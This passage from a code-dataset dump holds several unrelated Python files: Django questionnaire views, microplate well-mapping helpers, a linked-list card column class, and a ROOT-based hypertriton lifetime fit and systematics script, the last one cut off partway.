debug=True)","sub_path":"NiceFlask/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"283431849","text":"from django.core.urlresolvers import reverse\nfrom django.shortcuts import render\nfrom django.contrib import messages\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.views.generic import FormView\nfrom django.views.generic import View\nfrom braces.views import LoginRequiredMixin, MultiplePermissionsRequiredMixin, PermissionRequiredMixin\nfrom questionnaire.forms.questionnaires import QuestionnaireFilterForm, PublishQuestionnaireForm\n\nfrom questionnaire.forms.sections import SectionForm, SubSectionForm\nfrom questionnaire.mixins import AdvancedMultiplePermissionsRequiredMixin\nfrom questionnaire.services.questionnaire_cloner import QuestionnaireClonerService\nfrom questionnaire.services.questionnaire_finalizer import QuestionnaireFinalizeService\nfrom questionnaire.services.questionnaire_entry_form_service import QuestionnaireEntryFormService\nfrom questionnaire.models import Questionnaire, Section, QuestionGroup, Answer, AnswerGroup\nfrom questionnaire.forms.answers import NumericalAnswerForm, TextAnswerForm, DateAnswerForm, MultiChoiceAnswerForm\nfrom questionnaire.services.users import UserQuestionnaireService\n\n\nANSWER_FORM = {'Number': NumericalAnswerForm,\n 'Text': TextAnswerForm,\n 'Date': DateAnswerForm,\n 'MultiChoice': MultiChoiceAnswerForm,\n }\n\n\nclass Entry(AdvancedMultiplePermissionsRequiredMixin, FormView):\n template_name = 'questionnaires/entry/index.html'\n GET_permissions = {'any': ('auth.can_submit_responses', 'auth.can_view_users', 'auth.can_edit_questionnaire')}\n POST_permissions = {'any': ('auth.can_submit_responses', )}\n\n def get(self, request, *args, **kwargs):\n questionnaire = Questionnaire.objects.get(id=self.kwargs['questionnaire_id'])\n section = Section.objects.get(id=self.kwargs['section_id'])\n user_questionnaire_service = UserQuestionnaireService(self.request.user.user_profile.country, questionnaire)\n initial = {'status': 'Draft', 'country': self.request.user.user_profile.country,\n 'version': user_questionnaire_service.GET_version, 'questionnaire': questionnaire}\n required_answers = 'show' in request.GET\n formsets = QuestionnaireEntryFormService(section, initial=initial, highlight=required_answers,\n edit_after_submit=user_questionnaire_service.edit_after_submit)\n\n printable = 'printable' in request.GET\n preview = user_questionnaire_service.preview() or 'preview' in request.GET\n\n context = {'questionnaire': questionnaire,\n 'section': 
section, 'printable': printable,\n 'preview': preview, 'formsets': formsets,\n 'ordered_sections': questionnaire.sections.order_by('order'),\n 'form': SectionForm(initial={'questionnaire': questionnaire}),\n 'action': reverse('new_section_page', args=(questionnaire.id, )),\n 'subsection_form': SubSectionForm(),\n 'subsection_action': reverse('new_subsection_page', args=(questionnaire.id, section.id)),\n 'documents': user_questionnaire_service.attachments()}\n\n return self.render_to_response(context)\n\n def post(self, request, *args, **kwargs):\n questionnaire = Questionnaire.objects.get(id=self.kwargs['questionnaire_id'])\n section = Section.objects.get(id=self.kwargs['section_id'])\n user_questionnaire_service = UserQuestionnaireService(self.request.user.user_profile.country, questionnaire)\n initial = {'country': self.request.user.user_profile.country, 'status': 'Draft',\n 'version': user_questionnaire_service.POST_version, 'questionnaire': questionnaire}\n formsets = QuestionnaireEntryFormService(section, initial=initial, data=request.POST,\n edit_after_submit=user_questionnaire_service.edit_after_submit)\n\n context = {'questionnaire': questionnaire, 'section': section,\n 'formsets': formsets, 'ordered_sections': questionnaire.sections.order_by('order'),\n 'form': SectionForm(initial={'questionnaire': questionnaire}),\n 'action': reverse('new_section_page', args=(questionnaire.id, )),\n 'subsection_form': SubSectionForm(),\n 'subsection_action': reverse('new_subsection_page', args=(questionnaire.id, section.id)),\n 'documents': user_questionnaire_service.attachments()}\n\n if formsets.is_valid():\n return self._form_valid(request, formsets, context)\n return self._form_invalid(request, context)\n\n def _form_valid(self, request, formsets, context):\n formsets.save()\n message = 'Draft saved.'\n messages.success(request, message)\n if request.POST.get('redirect_url', None):\n return HttpResponseRedirect(request.POST['redirect_url'].replace('preview=1', ''))\n return self.render_to_response(context)\n\n def _form_invalid(self, request, context):\n message = 'Draft NOT saved. 
See errors below.'\n messages.error(request, message)\n return self.render_to_response(context)\n\n\nclass SubmitQuestionnaire(AdvancedMultiplePermissionsRequiredMixin, View):\n GET_permissions = {'any': ('auth.can_submit_responses', 'auth.can_view_users', 'auth.can_edit_questionnaire')}\n POST_permissions = {'any': ('auth.can_submit_responses', )}\n\n def post(self, request, *args, **kwargs):\n user_country = self.request.user.user_profile.country\n questionnaire = Questionnaire.objects.get(id=self.kwargs['questionnaire_id'])\n user_questionnaire = UserQuestionnaireService(user_country, questionnaire)\n if not user_questionnaire.required_sections_answered():\n return self._reload_section_with_required_answers_errors(request, user_questionnaire, *args, **kwargs)\n return self._submit_answers(request, user_questionnaire, *args, **kwargs)\n\n def _submit_answers(self, request, user_questionnaire_service, *args, **kwargs):\n user_questionnaire_service.submit()\n referer_url = request.META.get('HTTP_REFERER', None)\n redirect_url = referer_url or reverse('home_page')\n redirect_url = self._format_redirect_url(redirect_url)\n messages.success(request, 'Questionnaire Submitted.')\n return HttpResponseRedirect(redirect_url)\n\n def _reload_section_with_required_answers_errors(self, request, user_questionnaire_service, *args, **kwargs):\n section = user_questionnaire_service.unanswered_section\n questionnaire = user_questionnaire_service.questionnaire\n messages.error(request, 'Questionnaire NOT submitted. See errors below.')\n redirect_url = reverse('questionnaire_entry_page', args=(questionnaire.id, section.id))\n return HttpResponseRedirect('%s?show=errors' % redirect_url)\n\n def _format_redirect_url(self, redirect_url):\n redirect_url = redirect_url.replace('?show=errors', '')\n return \"%s?preview=1\" % redirect_url\n\n\nclass DuplicateQuestionnaire(MultiplePermissionsRequiredMixin, View):\n permissions = {'any': ('auth.can_view_users',)}\n\n def post(self, *args, **kwargs):\n form = QuestionnaireFilterForm(self.request.POST)\n if form.is_valid():\n duplicate, _ = QuestionnaireClonerService(form.cleaned_data['questionnaire']).clone()\n duplicate.name = form.cleaned_data['name']\n duplicate.year = form.cleaned_data['year']\n duplicate.save()\n message = \"The questionnaire has been duplicated successfully, You can now go ahead and edit it\"\n messages.success(self.request, message)\n redirect_url = reverse('questionnaire_entry_page', args=(duplicate.id, duplicate.sections.all()[0].id))\n return HttpResponseRedirect(redirect_url)\n message = \"Questionnaire could not be duplicated see errors below\"\n messages.error(self.request, message)\n return HttpResponseRedirect(reverse('manage_jrf_page'))\n\n\nclass FinalizeQuestionnaire(MultiplePermissionsRequiredMixin, View):\n permissions = {'any': ('auth.can_view_users','auth.can_edit_questionnaire')}\n\n def post(self, request, *args, **kwargs):\n questionnaire = Questionnaire.objects.get(id=kwargs['questionnaire_id'])\n message = QuestionnaireFinalizeService(questionnaire).finalize()\n messages.success(self.request, message)\n referer_url = request.META['HTTP_REFERER']\n return HttpResponseRedirect(referer_url)\n\n\nclass UnfinalizeQuestionnaire(MultiplePermissionsRequiredMixin, View):\n permissions = {'any': ('auth.can_view_users', 'auth.can_edit_questionnaire')}\n\n def post(self, request, *args, **kwargs):\n questionnaire = Questionnaire.objects.get(id=kwargs['questionnaire_id'])\n message = 
QuestionnaireFinalizeService(questionnaire).unfinalize()\n messages.success(self.request, message)\n referer_url = request.META.get('HTTP_REFERER', None) or reverse('manage_jrf_page')\n return HttpResponseRedirect(referer_url)\n\n\nclass PublishQuestionnaire(PermissionRequiredMixin, View):\n permission_required = 'auth.can_view_users'\n\n template_name = 'questionnaires/_publish.html'\n\n def get(self, *args, **kwargs):\n questionnaire = Questionnaire.objects.get(id=self.kwargs['questionnaire_id'])\n form = PublishQuestionnaireForm(initial={'questionnaire': questionnaire})\n context = {'questionnaire': questionnaire,\n 'publish_form': form, 'btn_label': \"Publish\",\n 'cancel_url': reverse('manage_jrf_page')}\n return render(self.request, self.template_name, context)\n\n def post(self, *args, **kwargs):\n questionnaire = Questionnaire.objects.get(id=self.kwargs['questionnaire_id'])\n form = PublishQuestionnaireForm(initial={'questionnaire': questionnaire}, data=self.request.POST)\n if form.is_valid():\n form.save()\n message = \"The questionnaire has been published to %s\" % \", \".join([region.name for region in form.cleaned_data['regions']])\n messages.success(self.request, message)\n return HttpResponseRedirect(reverse('manage_jrf_page'))\n else:\n message = \"Questionnaire could not be published see errors below\"\n messages.error(self.request, message)\n context = {'questionnaire': questionnaire, 'publish_form': form, 'btn_label': \"Publish\",\n 'cancel_url': reverse('manage_jrf_page')}\n return render(self.request, self.template_name, context)\n\n\nclass ApproveQuestionnaire(MultiplePermissionsRequiredMixin, View):\n permissions = {'any': ('auth.can_view_users',)}\n template_name = 'base/modals/_confirm.html'\n\n def get(self, *args, **kwargs):\n questionnaire = Questionnaire.objects.get(id=self.kwargs['questionnaire_id'])\n context = {'questionnaire': questionnaire, 'btn_label': \"Approve\",\n 'cancel_url': reverse('manage_jrf_page')}\n return render(self.request, self.template_name, context)\n\n def post(self, request, *args, **kwargs):\n questionnaire = Questionnaire.objects.get(id=kwargs['questionnaire_id'])\n message = QuestionnaireFinalizeService(questionnaire).approve()\n messages.success(self.request, message)\n referer_url = request.META['HTTP_REFERER']\n return HttpResponseRedirect(referer_url)\n\n\nclass DeleteAnswerRow(PermissionRequiredMixin, View):\n permission_required = 'auth.can_submit_responses'\n\n def post(self, request, *args, **kwargs):\n group = QuestionGroup.objects.get(id=kwargs['group_id'])\n primary_answer_id = request.POST.get('primary_answer')\n primary_answer = Answer.objects.filter(id=primary_answer_id).select_subclasses()\n country = self.request.user.user_profile.country\n if self._can_be_deleted(primary_answer, group, country):\n self._delete_answer_row(primary_answer, group)\n return HttpResponse()\n\n def _delete_answer_row(self, primary_answer, group):\n answergroup_filter = primary_answer[0].answergroup.filter(grouped_question=group)\n answergroup_filter[0].answer.all().delete()\n answergroup_filter.delete()\n\n def _can_be_deleted(self, primary_answer, group, country):\n return primary_answer and group.grid and country == primary_answer[0].country","sub_path":"questionnaire/views/questionnaires.py","file_name":"questionnaires.py","file_ext":"py","file_size_in_byte":12486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"73558866","text":"import numpy as np\n\n\ndef 
get_well_positions(Designs, drug, concentration):\n \"\"\" Function that returns the well in a Design xarray\n given the drug name and concentration\n\n Parameters\n ----------\n Designs: xarray structure\n\n drug: str\n name of drug being queried\n\n concentration: int\n dose value being queried\n\n Returns\n -------\n wells: list\n list of wells on the plate\n \"\"\"\n try:\n arr = Designs[drug].values\n except KeyError:\n print(\"queried drug not in plate\")\n return []\n ind = np.where(arr == concentration)\n wells = []\n if len(ind[0]) > 0:\n for i in range(len(ind[0])):\n pos = '%s%s' % (chr(65+ind[0][i]), ind[1][i]+1)\n wells.append(pos)\n return wells\n\n\ndef get_well_index(well, plate_dims):\n \"\"\"Function that maps well coordinate to a numerical id\n between 0 and number of wells on the plate\n\n Parameters\n ----------\n well: str\n well coordinate on plate eg: 'B10'\n plate_dims: np array\n dimensions of plate\n\n Returns\n -------\n index: int\n numerical id of the well\n \"\"\"\n\n row_num = ord(well[0]) - 65\n col_num = int(well[1:]) - 1\n index = row_num*plate_dims[1] + col_num\n return index\n\n\ndef get_inner_untreated_wells(Design, drugs):\n \"\"\" function that checks for and returns list of wells\n available in the inner wells\n\n Parameters\n ----------\n Design: xarray structure\n drugs: list\n list of drugs\n\n Returns\n -------\n pos_wells: list\n list of well names\n \"\"\"\n\n untreated_wells = np.ones([16, 24], dtype=bool)\n treatments = drugs + ['DMSO']\n for i, tr in enumerate(treatments):\n nparray = Design[tr].values\n pos = np.nonzero(nparray)\n for l in range(len(pos[0])):\n untreated_wells[pos[0][l], pos[1][l]] = False\n untreated_wells[0, :] = False\n untreated_wells[-1, :] = False\n untreated_wells[:, 0] = False\n untreated_wells[:, -1] = False\n pos = np.nonzero(untreated_wells)\n rows = [chr(65+i) for i in pos[0]]\n cols = [str(j+1) for j in pos[1]]\n pos_wells = [i+j for i, j in zip(rows, cols)]\n return pos_wells\n\n\ndef get_well_name(well_id, plate_dims):\n \"\"\"Function that maps well numerical id to name (label)\n\n Parameters\n ----------\n well_id: int\n well id on plate eg: 234\n plate_dims: np array\n dimensions of plate\n\n Returns\n -------\n well_name: str\n coordinate label of the well, eg: 'B10'\n \"\"\"\n\n row_num, col_num = divmod(well_id, plate_dims[1])\n row_label = chr(65 + row_num)\n col_label = col_num + 1\n well_name = \"%s%02d\" % (row_label, col_label)\n return well_name\n","sub_path":"datarail/experimental_design/well_mapper.py","file_name":"well_mapper.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"549781751","text":"class CardColumn:\n def __init__(self):\n self._head = None\n self._length = 0\n\n def head(self):\n return self._head\n\n def tail(self):\n # the column only tracks its head, so walk to the last card\n cur = self._head\n while cur is not None and cur.next() is not None:\n cur = cur.next()\n return cur\n\n def length(self):\n return self._length\n\n def is_empty(self):\n if self._length == 0:\n return True\n\n return False\n\n def append(self, card):\n if self._head is None:\n self._head = card\n else:\n card.set_next(self._head)\n self._head = card\n self._length += 1\n\n def append_stack(self, head):\n if self._head is None:\n self._head = head\n # count the cards of the incoming chain so _length stays correct\n cur = head\n while cur is not None:\n self._length += 1\n cur = cur.next()\n else:\n stack = [head]\n cur = head\n length = 1\n while cur.next() is not None:\n cur = cur.next()\n stack.append(cur)\n length += 1\n\n i = len(stack) - 1\n while i >= 0:\n self.append(stack[i])\n i -= 1\n\n def pop(self):\n tmp = self._head\n self._head = self._head.next()\n tmp.set_next(None)\n self._length -= 1\n\n 
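# the popped card is fully detached (next pointer cleared above), so\n # callers can safely append it to another CardColumn\n 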
return tmp\n\n def pop_stack(self, length):\n first = self._head\n for _ in range(length-1):\n self._head = self._head.next()\n\n last = self._head\n self._head = self._head.next()\n last.set_next(None)\n self._length -= length\n\n return first\n\n def can_be_stacked_onto_by(self, card):\n if self._head.can_be_stacked_onto_by(card):\n return True\n\n return False\n\n def stack_is_valid(self, length):\n if length <= 0 or length > self._length:\n return False\n cur = self._head\n for _ in range(length-1):\n nxt = cur.next()\n if not nxt.can_be_stacked_onto_by(cur):\n return False\n # advance the cursor so each consecutive pair is checked\n cur = nxt\n\n return True\n\n def __getitem__(self, item):\n ret = self._head\n for _ in range(item):\n ret = ret.next()\n\n return ret\n\n def __len__(self):\n return self._length\n","sub_path":"CardColumn.py","file_name":"CardColumn.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"420780195","text":"#!/usr/bin/env python3\n\nimport argparse\nimport math\nimport os\n\nimport hyp_analysis_utils as hau\nimport hyp_plot_utils as hpu\nimport numpy as np\nimport pandas as pd\nimport yaml\nfrom scipy import stats\n\nimport ROOT\nROOT.gROOT.SetBatch()\nnp.random.seed(42)\nROOT.gROOT.LoadMacro('RooCustomPdfs/RooDSCBShape.cxx++')\nfrom ROOT import RooDSCBShape\n\n\n###############################################################################\nparser = argparse.ArgumentParser()\nparser.add_argument('config', help='Path to the YAML configuration file')\nparser.add_argument('-s', '--significance',\n help='Use the BDTefficiency selection from the significance scan', action='store_true')\nparser.add_argument('-syst', '--systematics',\n help='Run systematic uncertainties estimation', action='store_true')\nparser.add_argument('-dbshape', '--dbshape',\n help='Fit using DSCBShape', action='store_true')\nparser.add_argument('-matter', '--matter',\n help='Run with matter', action='store_true')\nparser.add_argument('-antimatter', '--antimatter',\n help='Run with antimatter', action='store_true')\nargs = parser.parse_args()\n\nwith open(os.path.expandvars(args.config), 'r') as stream:\n try:\n params = yaml.full_load(stream)\n except yaml.YAMLError as exc:\n print(exc)\n###############################################################################\n\nSPLIT = ''\n\nif args.matter:\n SPLIT = '_matter'\n\nif args.antimatter:\n SPLIT = '_antimatter'\n\n###############################################################################\n\n# define some globals\nFILE_PREFIX = params['FILE_PREFIX'] + SPLIT\n\nDATA_PATH = os.path.expandvars(params['DATA_PATH'])\n\nBKG_MODELS = params['BKG_MODELS'] if 'BKG_MODELS' in params else ['expo']\nCENT_CLASS = params['CENTRALITY_CLASS'][0]\nPT_BINS = params['PT_BINS']\nCT_BINS = params['CT_BINS']\n\nEFF_MIN, EFF_MAX, EFF_STEP = params['BDT_EFFICIENCY']\nEFF_ARRAY = np.around(np.arange(EFF_MIN, EFF_MAX+EFF_STEP, EFF_STEP), 2)\n\nSIGNIFICANCE_SCAN = args.significance\nSYSTEMATICS = args.systematics\nDBSHAPE = args.dbshape\n\nSYSTEMATICS_COUNTS = 100\nFIX_EFF = 0.70 if not SIGNIFICANCE_SCAN else 0\n###############################################################################\n\n###############################################################################\n# input/output files\nresults_dir = os.environ['HYPERML_RESULTS_{}'.format(params['NBODY'])]\ntables_dir = os.path.dirname(DATA_PATH)\nefficiency_dir = os.environ['HYPERML_EFFICIENCIES_{}'.format(params['NBODY'])]\n\n# significance scan output\nfile_name = 
results_dir + f'/Efficiencies/{FILE_PREFIX}_sigscan.npy'\nsigscan_dict = np.load(file_name, allow_pickle=True).item()\n\n\nsuffix = \"\" if not DBSHAPE else \"_dscb\"\n# output file\nfile_name = results_dir + f'/{FILE_PREFIX}_lifetime{suffix}.root'\noutput_file = ROOT.TFile(file_name, 'recreate')\n###############################################################################\n\nfile_name = results_dir + f'/{FILE_PREFIX}_signal_extraction{suffix}.root'\nprint(file_name)\ninput_file = ROOT.TFile(file_name)\n\n###############################################################################\n\nfile_name = efficiency_dir + f'/{FILE_PREFIX}_preseleff_cent090.root'\n# efficiency_file = ROOT.TFile(file_name, 'read')\n# EFFICIENCY = efficiency_file.Get('PreselEff').ProjectionY()\n# EFFICIENCY.SetDirectory(0)\nefficiency_file = ROOT.TFile('../2body/Macro/eff_ct_090_rew.root', 'read')\nEFFICIENCY = efficiency_file.Get('eff_ct_090_rew')\nEFFICIENCY.SetDirectory(0)\n\nfile_name = results_dir + '/He3_abs_1.5.root'\nabs_file = ROOT.TFile(file_name, 'read')\nABSORPTION = abs_file.Get('0_90/fEffCt_antimatter_cent_0_90_func_BGBW')\nABSORPTION.SetDirectory(0)\n\n\nfile_name = results_dir + '/He3_abs_try.root'\nabs_file = ROOT.TFile(file_name, 'read')\nMATTER_ABSORPTION = abs_file.Get('0_90/matter_antimatter_ratio')\nMATTER_ABSORPTION.SetDirectory(0)\n\n\n###############################################################################\n# define support globals and methods for getting hypertriton counts\nRAW_COUNTS_H2 = {}\nRAW_COUNTS_BEST = {}\n\nCORRECTED_COUNTS_H2 = {}\nCORRECTED_COUNTS_BEST = {}\n\n\n# prepare histograms for the analysis\nfor model in BKG_MODELS:\n RAW_COUNTS_H2[model] = input_file.Get(f'raw_counts_{model}')\n RAW_COUNTS_BEST[model] = RAW_COUNTS_H2[model].ProjectionX(\n f'raw_counts_best_{model}')\n CORRECTED_COUNTS_H2[model] = RAW_COUNTS_H2[model].Clone('corrected_counts')\n CORRECTED_COUNTS_BEST[model] = RAW_COUNTS_BEST[model].Clone(\n 'corrected_counts_best')\n\n\ndef get_presel_eff(ctbin):\n return EFFICIENCY.GetBinContent(EFFICIENCY.FindBin((ctbin[0] + ctbin[1]) / 2))\n\n\ndef get_absorption_correction(ctbin):\n abso = ABSORPTION.GetBinContent(ABSORPTION.FindBin((ctbin[0] + ctbin[1]) / 2))\n matter_abso = abso * \\\n MATTER_ABSORPTION.GetBinContent(\n MATTER_ABSORPTION.FindBin((ctbin[0] + ctbin[1]) / 2))\n if SPLIT == '_antimatter':\n return abso\n if SPLIT == '_matter':\n return matter_abso\n abso = (abso + matter_abso)/2\n return abso\n\n\ndef fill_raw(bkg, ctbin, counts, counts_err, eff):\n bin_idx = RAW_COUNTS_H2[bkg].FindBin(\n (ctbin[0] + ctbin[1]) / 2, round(eff + 0.005, 3))\n RAW_COUNTS_H2[bkg].SetBinContent(bin_idx, counts)\n RAW_COUNTS_H2[bkg].SetBinError(bin_idx, counts_err)\n\n\ndef fill_raw_best(bkg, ctbin, counts, counts_err, eff):\n bin_idx = RAW_COUNTS_BEST[bkg].FindBin((ctbin[0] + ctbin[1]) / 2)\n RAW_COUNTS_BEST[bkg].SetBinContent(bin_idx, counts)\n RAW_COUNTS_BEST[bkg].SetBinError(bin_idx, counts_err)\n\n\ndef fill_corrected(bkg, ctbin, counts, counts_err, eff):\n bin_idx = CORRECTED_COUNTS_H2[bkg].FindBin(\n (ctbin[0] + ctbin[1]) / 2, round(eff + 0.005, 3))\n bin_idx1d = CORRECTED_COUNTS_BEST[bkg].FindBin((ctbin[0] + ctbin[1]) / 2)\n abs_corr = get_absorption_correction(ctbin)\n presel_eff = get_presel_eff(ctbin)\n bin_width = CORRECTED_COUNTS_BEST[bkg].GetBinWidth(bin_idx1d)\n\n CORRECTED_COUNTS_H2[bkg].SetBinContent(\n bin_idx, counts/eff/presel_eff/abs_corr/bin_width)\n CORRECTED_COUNTS_H2[bkg].SetBinError(\n bin_idx, 
counts_err/eff/presel_eff/abs_corr/bin_width)\n\n\ndef fill_corrected_best(bkg, ctbin, counts, counts_err, eff):\n bin_idx = CORRECTED_COUNTS_BEST[bkg].FindBin((ctbin[0] + ctbin[1]) / 2)\n abs_corr = get_absorption_correction(ctbin)\n presel_eff = get_presel_eff(ctbin)\n bin_width = CORRECTED_COUNTS_BEST[bkg].GetBinWidth(bin_idx)\n\n CORRECTED_COUNTS_BEST[bkg].SetBinContent(\n bin_idx, counts/eff/presel_eff/abs_corr/bin_width)\n CORRECTED_COUNTS_BEST[bkg].SetBinError(\n bin_idx, counts_err/eff/presel_eff/abs_corr/bin_width)\n\n\ndef get_signscan_eff(ctbin):\n key = f'ct{ctbin[0]}{ctbin[1]}pt{PT_BINS[0]}{PT_BINS[1]}'\n return sigscan_dict[key]\n\n\ndef get_eff_index(eff):\n idx = (eff - EFF_MIN + EFF_STEP) * 100\n if isinstance(eff, np.ndarray):\n return idx.astype(int)\n\n return int(idx)\n\n\ndef get_corrected_counts(bkg, ctbin, eff):\n bin_idx = CORRECTED_COUNTS_H2[bkg].FindBin(\n (ctbin[0] + ctbin[1]) / 2, round(eff + 0.005, 3))\n\n counts = CORRECTED_COUNTS_H2[bkg].GetBinContent(bin_idx)\n error = CORRECTED_COUNTS_H2[bkg].GetBinError(bin_idx)\n\n return counts, error\n\n\ndef get_measured_h2(h2, bkg, ctbin, eff):\n bin_idx = h2[bkg].FindBin((ctbin[0] + ctbin[1]) / 2, round(eff + 0.005, 3))\n var = h2[bkg].GetBinContent(bin_idx)\n error = h2[bkg].GetBinError(bin_idx)\n return var, error\n\n\ndef get_effscore_dict(ctbin):\n info_string = f'090_210_{ctbin[0]}{ctbin[1]}'\n file_name = efficiency_dir + f'/Eff_Score_{info_string}.npy'\n return {round(e[0], 2): e[1] for e in np.load(file_name).T}\n\n\n###############################################################################\n# significance-scan/fixed efficiencies switch\n\nif not SIGNIFICANCE_SCAN:\n eff_best_array = np.full(len(CT_BINS) - 1, FIX_EFF)\nelse:\n eff_best_array = [round(sigscan_dict[f'ct{ctbin[0]}{ctbin[1]}pt210'][0], 2) for ctbin in zip(\n CT_BINS[:-1], CT_BINS[1:])]\n\n# efficiency ranges for sampling the systematics\nsyst_eff_ranges = np.asarray([list(range(int(x * 100) - 10, int(x * 100) + 11)) for x in eff_best_array]) / 100\n# define the expo function for the lifetime fit\nexpo = ROOT.TF1('myexpo', '[0]*exp(-x/([1]*0.029979245800))/((exp(-[2]/([1]*0.029979245800)) - exp(-[3]/([1]*0.029979245800))) * [1]*0.029979245800)', 1, 35)\nexpo.SetParLimits(1, 230, 290)\n#################################################\n\n\nfor index, ctbin in enumerate(zip(CT_BINS[:-1], CT_BINS[1:])):\n bdt_eff_best = round(sigscan_dict[f'ct{ctbin[0]}{ctbin[1]}pt210'][0], 2)\n presel_eff = get_presel_eff(ctbin)\n for bdt_eff in syst_eff_ranges[index]:\n for model in BKG_MODELS:\n raw_counts, raw_counts_error = get_measured_h2(\n RAW_COUNTS_H2, model, ctbin, bdt_eff)\n fill_corrected(model, ctbin, raw_counts, raw_counts_error, bdt_eff)\n # print(\"ct bin: \", ctbin, \"BDT eff best: \", bdt_eff_best, \", BDT eff: \", bdt_eff, \", Raw counts: \", raw_counts)\n if bdt_eff == bdt_eff_best:\n print(\"ct bin: \", ctbin, \"BDT eff best: \", bdt_eff_best, \", Presel eff: \", presel_eff, \", Raw counts: \", raw_counts)\n\n fill_corrected_best(model, ctbin, raw_counts,raw_counts_error, bdt_eff)\n\n\ntau_syst_array = np.zeros(SYSTEMATICS_COUNTS)\n\nif SYSTEMATICS:\n # systematics histos\n lifetime_dist = ROOT.TH1D(\n 'syst_lifetime', ';#tau ps ;counts', 100, 150, 350)\n lifetime_prob = ROOT.TH1D('prob_lifetime', ';prob. 
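The 'myexpo' TF1 defined above is an exponential divided by its own integral over the fit window, so parameter [0] is the total yield. A small standalone numpy check with illustrative values (tau, A and the window below are assumptions, not fitted numbers):

    import numpy as np

    tau, A = 260.0, 100.0          # ps and yield: made-up illustration values
    c = 0.029979245800             # cm/ps, same constant as in the TF1 string
    ct_min, ct_max = 1.0, 35.0     # fit window used above

    def dn_dct(ct):
        k = tau * c
        norm = (np.exp(-ct_min / k) - np.exp(-ct_max / k)) * k
        return A * np.exp(-ct / k) / norm

    edges = np.linspace(ct_min, ct_max, 200001)
    mids = 0.5 * (edges[:-1] + edges[1:])
    integral = np.sum(dn_dct(mids)) * (edges[1] - edges[0])
    assert abs(integral - A) < 1e-4   # integral over the window recovers A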
;counts', 100, 0, 1)\n\n tmp_ctdist = CORRECTED_COUNTS_BEST[BKG_MODELS[0]].Clone('tmp_ctdist')\n\n combinations = set()\n sample_counts = 0 # good fits;\n iterations = 0 # total fits\n\n # stop with SYSTEMATICS_COUNTS number of good B_{Lambda} fits\n while sample_counts < SYSTEMATICS_COUNTS:\n tmp_ctdist.Reset()\n\n iterations += 1\n\n bkg_list = []\n eff_list = []\n bkg_idx_list = []\n eff_idx_list = []\n\n # loop over ctbins\n for ctbin_idx in range(len(CT_BINS) - 1):\n # random bkg model\n bkg_index = np.random.randint(0, len(BKG_MODELS))\n bkg_idx_list.append(bkg_index)\n bkg_list.append(BKG_MODELS[bkg_index])\n\n # random BDT efficiency in the defined range\n eff = np.random.choice(syst_eff_ranges[ctbin_idx])\n eff_list.append(eff)\n eff_idx = get_eff_index(eff)\n eff_idx_list.append(eff_idx)\n\n # convert indexes into hash and if already sampled skip this combination\n combo = ''.join(map(str, bkg_idx_list + eff_idx_list))\n if combo in combinations:\n continue\n\n # if indexes are good measure lifetime\n ctbin_idx = 1\n ct_bin_it = iter(zip(CT_BINS[:-1], CT_BINS[1:]))\n\n for model, eff in zip(bkg_list, eff_list):\n ctbin = next(ct_bin_it)\n\n counts, error = get_corrected_counts(model, ctbin, eff)\n\n tmp_ctdist.SetBinContent(ctbin_idx, counts)\n tmp_ctdist.SetBinError(ctbin_idx, error)\n\n ctbin_idx += 1\n\n tmp_ctdist.Fit(expo, 'QRMSI+', '', 1, 35)\n\n # if ct fit is good use it for systematics\n if expo.GetChisquare() > 2. * expo.GetNDF():\n continue\n\n lifetime_dist.Fill(expo.GetParameter(1))\n lifetime_prob.Fill(expo.GetProb())\n\n combinations.add(combo)\n\n tau_syst_array[sample_counts] = expo.GetParameter(1)\n sample_counts += 1\n\n output_file.cd()\n\n lifetime_dist.Write()\n lifetime_prob.Write()\n\n print('\\n++++++++++++++++++++++++++++++++++++++++++++++++++')\n print(\n f'\\nGood iterations / Total iterations -> {SYSTEMATICS_COUNTS/iterations:.4f}')\n print('\\n++++++++++++++++++++++++++++++++++++++++++++++++++')\n\n\nkBlueC = ROOT.TColor.GetColor('#1f78b4')\nkOrangeC = ROOT.TColor.GetColor(\"#ff7f00\")\nkBlueCT = ROOT.TColor.GetColorTransparent(kBlueC, 0.5)\nkRedC = ROOT.TColor.GetColor('#e31a1c')\nkRedCT = ROOT.TColor.GetColorTransparent(kRedC, 0.5)\n\nlikelihood = False\nopt_fit = 'QRMSIL+' if likelihood else 'QRMSI+'\nfit_range = [1,35]\n\nnp.save(results_dir + f'/{FILE_PREFIX}_tau_syst_array.npy', tau_syst_array)\n\nfor model in BKG_MODELS:\n output_file.cd()\n\n RAW_COUNTS_H2[model].Write()\n RAW_COUNTS_BEST[model].Write()\n\n CORRECTED_COUNTS_H2[model].Write()\n CORRECTED_COUNTS_BEST[model].Write()\n\n CORRECTED_COUNTS_BEST[model].UseCurrentStyle()\n\n\n\n\n\n\n\n print('Integral: ', CORRECTED_COUNTS_BEST[model].Integral(fit_range[0],fit_range[1], \"width\"))\n expo.FixParameter(0, CORRECTED_COUNTS_BEST[model].Integral(fit_range[0],fit_range[1], \"width\"))\n expo.FixParameter(2, fit_range[0])\n expo.FixParameter(3, fit_range[1])\n fit_result = CORRECTED_COUNTS_BEST[model].Fit(expo, opt_fit, '', fit_range[0], fit_range[1])\n print('Function Integral: ', expo.Integral(1,35))\n\n chi2 = 0\n for iBin in range(1,CORRECTED_COUNTS_BEST[model].GetNbinsX() + 1):\n diff = (expo.Integral(CORRECTED_COUNTS_BEST[model].GetBinLowEdge(iBin), CORRECTED_COUNTS_BEST[model].GetXaxis().GetBinUpEdge(iBin)) - CORRECTED_COUNTS_BEST[model].GetBinContent(iBin)*CORRECTED_COUNTS_BEST[model].GetBinWidth(iBin))**2\n den = (CORRECTED_COUNTS_BEST[model].GetBinError(iBin)*CORRECTED_COUNTS_BEST[model].GetBinWidth(iBin))**2\n chi2 += diff/den\n\n\n print('Chi2: ', chi2/(expo.GetNDF()))\n 
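The combination bookkeeping in the systematics loop above (hash the sampled background-model and efficiency indexes, skip repeats) reduces to a few lines; a toy version, not from the source:

    import random

    seen = set()
    draws = 0
    while len(seen) < 5:           # stop once 5 distinct combinations are kept
        draws += 1
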